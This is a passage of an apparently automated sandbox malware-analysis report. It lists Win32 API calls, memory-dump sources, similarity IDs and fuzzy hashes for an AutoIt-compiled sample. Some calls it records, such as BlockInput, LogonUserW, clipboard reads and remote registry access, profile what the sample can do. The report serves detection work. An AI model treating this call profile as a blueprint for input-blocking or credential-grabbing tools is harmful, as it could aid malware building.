• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LogonUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: N@
                                                                                                                                                    • API String ID: 0-1509896676
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
Memory Dump Source
• Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2f30000_x.jbxd
APIs
• DeleteObject.GDI32(?), ref: 0045953B
• DeleteObject.GDI32(?), ref: 00459551
• DestroyWindow.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• GetWindowRect.USER32(00000000), ref: 00459588
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetClientRect.USER32(00000000,?), ref: 004596F8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
• GlobalLock.KERNEL32(00000000), ref: 0045978F
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• GlobalUnlock.KERNEL32(00000000), ref: 004597A5
• CloseHandle.KERNEL32(00000000), ref: 004597AC
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• GlobalFree.KERNEL32(00000000), ref: 004597E2
• CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
• SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
• ShowWindow.USER32(?,00000004), ref: 00459865
• CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• GetStockObject.GDI32(00000011), ref: 004598CD
• SelectObject.GDI32(00000000,00000000), ref: 004598D5
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
• DeleteDC.GDI32(00000000), ref: 004598F8
• _wcslen.LIBCMT ref: 00459916
• _wcscpy.LIBCMT ref: 0045993A
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
• GetDC.USER32(00000000), ref: 004599FC
• SelectObject.GDI32(00000000,?), ref: 00459A0C
• SelectObject.GDI32(00000000,00000007), ref: 00459A37
• ReleaseDC.USER32(00000000,00000000), ref: 00459A42
• MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 4040870279-2373415609
APIs
• GetSysColor.USER32(00000012), ref: 0044181E
• SetTextColor.GDI32(?,?), ref: 00441826
• GetSysColorBrush.USER32(0000000F), ref: 0044183D
• GetSysColor.USER32(0000000F), ref: 00441849
• SetBkColor.GDI32(?,?), ref: 00441864
• SelectObject.GDI32(?,?), ref: 00441874
• InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
• GetSysColor.USER32(00000010), ref: 004418B2
• CreateSolidBrush.GDI32(00000000), ref: 004418B9
• FrameRect.USER32(?,?,00000000), ref: 004418CA
• DeleteObject.GDI32(?), ref: 004418D5
• InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
• FillRect.USER32(?,?,?), ref: 00441970
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
• String ID:
• API String ID: 69173610-0
APIs
• DestroyWindow.USER32(?), ref: 004590F2
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetClientRect.USER32(00000000,?), ref: 0045924E
• CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
• GetStockObject.GDI32(00000011), ref: 004592AC
• SelectObject.GDI32(00000000,00000000), ref: 004592B4
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• DeleteDC.GDI32(00000000), ref: 004592D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• SetCursor.USER32(00000000), ref: 00430773
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
• SetCursor.USER32(00000000), ref: 0043078B
• LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
• SetCursor.USER32(00000000), ref: 004307A3
• LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
• SetCursor.USER32(00000000), ref: 004307BB
• LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
• SetCursor.USER32(00000000), ref: 004307D3
• LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
• SetCursor.USER32(00000000), ref: 004307EB
• LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
• SetCursor.USER32(00000000), ref: 00430803
• LoadCursorW.USER32(00000000,00007F85), ref: 00430814
• SetCursor.USER32(00000000), ref: 0043081B
• LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
• SetCursor.USER32(00000000), ref: 00430833
• LoadCursorW.USER32(00000000,00007F84), ref: 00430844
• SetCursor.USER32(00000000), ref: 0043084B
• LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
• SetCursor.USER32(00000000), ref: 00430863
• LoadCursorW.USER32(00000000,00007F02), ref: 00430874
• SetCursor.USER32(00000000), ref: 0043087B
• SetCursor.USER32(00000000), ref: 00430887
• LoadCursorW.USER32(00000000,00007F00), ref: 00430898
• SetCursor.USER32(00000000), ref: 0043089F
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Cursor$Load
• String ID:
• API String ID: 1675784387-0
APIs
• GetSysColor.USER32(0000000E), ref: 00430913
• SetTextColor.GDI32(?,00000000), ref: 0043091B
• GetSysColor.USER32(00000012), ref: 00430933
• SetTextColor.GDI32(?,?), ref: 0043093B
• GetSysColorBrush.USER32(0000000F), ref: 0043094E
• GetSysColor.USER32(0000000F), ref: 00430959
• CreateSolidBrush.GDI32(?), ref: 00430962
• GetSysColor.USER32(00000011), ref: 00430979
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
• SelectObject.GDI32(?,00000000), ref: 0043099C
• SetBkColor.GDI32(?,?), ref: 004309A6
• SelectObject.GDI32(?,?), ref: 004309B4
• InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
• GetWindowLongW.USER32(?,000000F0), ref: 00430A09
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
• GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
• InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
• DrawFocusRect.USER32(?,?), ref: 00430A91
• GetSysColor.USER32(00000011), ref: 00430A9F
• SetTextColor.GDI32(?,00000000), ref: 00430AA7
• DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
• SelectObject.GDI32(?,?), ref: 00430AD0
• DeleteObject.GDI32(00000105), ref: 00430ADC
• SelectObject.GDI32(?,?), ref: 00430AE3
• DeleteObject.GDI32(?), ref: 00430AE9
• SetTextColor.GDI32(?,?), ref: 00430AF0
• SetBkColor.GDI32(?,?), ref: 00430AFB
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1582027408-0
                                                                                                                                                    • Opcode ID: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                                                                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                    • Opcode Fuzzy Hash: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                                                                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseConnectCreateRegistry
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 3217815495-966354055
                                                                                                                                                    • Opcode ID: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                                                                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                    • Opcode Fuzzy Hash: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                                                                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                    • String ID: ($,$tooltips_class32
                                                                                                                                                    • API String ID: 225202481-3320066284
                                                                                                                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 15083398-0
                                                                                                                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
